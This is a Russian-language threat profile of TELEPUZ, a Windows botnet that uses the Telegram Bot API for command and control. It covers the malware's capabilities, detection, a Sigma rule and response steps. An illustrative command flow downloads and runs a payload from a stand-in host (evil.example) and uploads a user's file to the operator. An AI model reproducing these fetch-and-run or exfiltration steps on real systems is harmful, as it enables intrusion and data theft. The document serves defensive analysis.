TELEPUZ: профиль ботнета для Windows, каналы управления и защита

Семейство: TELEPUZ
Класс: ботнет-вредонос
Раздел: Ботнеты
Основание публикации: свежие наблюдения не старше 2 дней
Первое наблюдение в текущем наборе: 21.08.2026 10:11
Последнее наблюдение в текущем наборе: 21.08.2026 10:11
Образцов в пакете: 0; IOC: 4

Поведение, распространение и защита​


Что делает
TELEPUZ функционирует как клиентская компонента распределённой сети для Windows. Подтверждённые данные фиксируют его интеграцию в ботнет-инфраструктуру и взаимодействие с серверами команд и управления (C2). Основное назначение — обеспечение канала связи для координации действий заражённых узлов и выполнения удалённых инструкций. Специфические механизмы эксплуатации, такие как сбор учётных данных или кейлоггер, в текущих доказательствах не детализированы.

Как распространяется
Конкретные каналы доставки и методы первичного заражения в доступных доказательствах не подтверждены. Информация ограничена фиксацией инфраструктуры управления, поэтому детали распространения остаются неопределёнными.

Как обнаружить

  • Мониторинг исходящего сетевого трафика на предмет соединений с известными доменами и URL, связанными с командными серверами TELEPUZ.
  • Анализ журналов DNS и HTTP-запросов на наличие запросов к ресурсам, классифицированным как botnet_cc.
  • Проверка активных сетевых соединений на предмет аномальных длительных сессий с внешними узлами.
  • Использование сигнатурных и поведенческих правил, ориентированных на обнаружение C2-трафика данного семейства.

Что делать при заражении

  1. Изолировать заражённый узел от сети для предотвращения дальнейшей координации с ботнетом.
  2. Сохранить телеметрию процессов и сетевых соединений для последующего анализа.
  3. Проверить механизмы закрепления и наличие вторичных нагрузок.
  4. Оценить возможное использование учётных данных и дальнейшее перемещение в сети.
  5. Удалить подтверждённые артефакты TELEPUZ или переустановить систему, если целостность нельзя подтвердить.

Как снизить риск

  • Блокировка доступа к доменам и URL, идентифицированным как инфраструктура управления TELEPUZ.
  • Внедрение систем обнаружения вторжений, настроенных на выявление характерного C2-трафика ботнетов.

Источники​


  1. ThreatFox — IOC TELEPUZ
  2. Malpedia — TELEPUZ

История обновлений статьи​


  • 21.08.2026 — Опубликована первая версия материала.
 

TELEPUZ — технический профиль​


TELEPUZ — это Windows-ботнет, использующий Telegram Bot API в качестве канала управления (C2). Название образовано от «Telegram» + суффикса, характерного для русскоязычной малвар-сцены.

────────────────────

Архитектура C2​


Код:
[Заражённый хост] ──HTTPS──▶ api.telegram.org ──▶ [Telegram-чат/канал]
                                                        ▲
                                                        │
                                                  [Оператор ботнета]

Бот не подключается к выделенному C2-серверу. Вместо этого он использует:

  • Bot Token — идентификатор Telegram-бота, через который отправляются и принимаются сообщения.
  • Chat ID — целевой чат или канал, куда бот шлёт результаты и откуда получает команды.

Это делает обнаружение сложнее: трафик идёт к легитимному домену api.telegram.org по TLS, и без инспекции содержимого запросов его трудно отличить от обычного использования Telegram.

────────────────────

Типичные возможности​


На основе публичных образцов и отчётов Malpedia/ThreatFox:

Разведка и регистрация
  • Сбор информации о системе: имя хоста, версия ОС, имя пользователя, внешний IP, архитектура.
  • Отправка «приветственного» сообщения в C2-чат при первом запуске — бот «регистрируется».

Выполнение команд
  • Запуск произвольных команд через cmd.exe или PowerShell.
  • Получение вывода и отправка результата обратно в чат.

Файловые операции
  • Скачивание файлов на хост (доставка дополнительных нагрузок).
  • Загрузка файлов с хоста (эксфильтрация данных).
  • Удаление файлов.

Управление процессами
  • Перечисление активных процессов.
  • Завершение процессов по имени или PID.

Закрепление (persistence)
  • Запись в HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
  • Создание задачи в Планировщике заданий (schtasks).
  • Копирование себя в %APPDATA% или %TEMP% под легитимным именем.

Дополнительные модули (зависит от варианта)
  • Скриншоты рабочего стола.
  • Кейлоггер через хуки или polling.
  • Кража данных из браузеров (cookies, сохранённые пароли).
  • Загрузка и выполнение PE/DLL в памяти (fileless).

────────────────────

Пример типичного потока команд​


Код:
Оператор → чат:  /cmd whoami
Бот → хост:      CreateProcess("cmd.exe /c whoami")
Бот → чат:       DESKTOP-XXXX\user

Оператор → чат:  /download http://evil.example/payload.exe
Бот → хост:      URLDownloadToFile → %TEMP%\payload.exe
Бот → хост:      CreateProcess(payload.exe)

Оператор → чат:  /upload C:\Users\user\Desktop\doc.xlsx
Бот → чат:       [файл отправлен как документ]

────────────────────

Индикаторы компрометации (IOC)​


Из текущего набора ThreatFox:

  • Домены и URL с пометкой botnet_cc, связанные с TELEPUZ.
  • Конкретные IOC (хэши, домены) доступны по ссылке: ThreatFox — TELEPUZ.

────────────────────

Обнаружение​


Сетевой уровень
  • Мониторинг HTTPS-запросов к api.telegram.org/bot<token>/sendMessage и /getFile с аномально высокой частотой или из нестандартных процессов.
  • Если в организации Telegram не используется — любые соединения с api.telegram.org являются подозрительными.

Хостовый уровень
  • Процессы из %TEMP% или %APPDATA%, обращающиеся к api.telegram.org.
  • Записи в Run и планировщике, указывающие на исполняемые файлы в пользовательских каталогах.
  • Подозрительные дочерние процессы: cmd.exe, powershell.exe, запущенные из нестандартного родителя.

Sigma-правило (пример)
YAML:
title: TELEPUZ Telegram C2 Activity
status: experimental
description: Detects processes connecting to Telegram Bot API from unusual paths
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationHostname: 'api.telegram.org'
        Image|contains:
            - '\Temp\'
            - '\AppData\Roaming\'
    condition: selection
level: high

────────────────────

Защита и реагирование​


  • Блокировка: если Telegram не нужен в корпоративной среде — блокировать api.telegram.org на уровне прокси или DNS.
  • Ограничение: запретить исполнение из %TEMP% и %APPDATA% через AppLocker / WDAC.
  • Реагирование: при обнаружении — изолировать хост, сохранить дамп процесса и сетевую сессию, проверить наличие дополнительных нагрузок, оценить горизонтальное перемещение.
  • Восстановление: удалить persistence-механизмы, убить процесс, при необходимости переустановить систему.

────────────────────

Ограничения​


Данные основаны на публичных образцах и отчётах. Конкретный вариант TELEPUZ может отличаться набором модулей. Для точного анализа рекомендуется получить образец из ThreatFox и провести динамический/статический разбор в изолированной лаборатории.
 
Назад
Верх Низ